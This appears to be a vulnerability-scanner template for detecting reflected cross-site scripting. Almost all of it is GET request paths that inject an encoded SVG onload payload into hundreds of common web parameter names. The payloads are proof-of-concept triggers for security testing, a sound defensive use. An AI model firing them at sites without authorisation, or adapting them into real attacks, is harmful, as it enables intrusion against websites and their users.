id: top-xss-params
info:
name: Top 38 Parameters - Cross-Site Scripting
author: foulenzer,geeknik
severity: high
description: Cross-site scripting was discovered by searching the server response to GET requests for reflected parameter values.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
max-request: 29
parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year
tags: xss,generic
http:
- method: GET
path:
- "{{BaseURL}}/?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E"
- "{{BaseURL}}/?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E"
- "{{BaseURL}}/?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E&section=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E"
- "{{BaseURL}}/?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E"
- "{{BaseURL}}/?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E"
- "{{BaseURL}}/?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E"
- "{{BaseURL}}/?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E"
- "{{BaseURL}}/?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E&note=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E"
- "{{BaseURL}}/?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E"
- "{{BaseURL}}/?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E"
- "{{BaseURL}}/?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E"
- "{{BaseURL}}/?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E&notes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E"
- "{{BaseURL}}/?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E"
- "{{BaseURL}}/?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E"
- "{{BaseURL}}/?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E"
- "{{BaseURL}}/?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E&copy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E"
- "{{BaseURL}}/?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E"
- "{{BaseURL}}/?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E"
- "{{BaseURL}}/?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E&params=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E"
- "{{BaseURL}}/?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E"
- "{{BaseURL}}/?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E"
- "{{BaseURL}}/?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E"
- "{{BaseURL}}/?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E"
- "{{BaseURL}}/?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&ren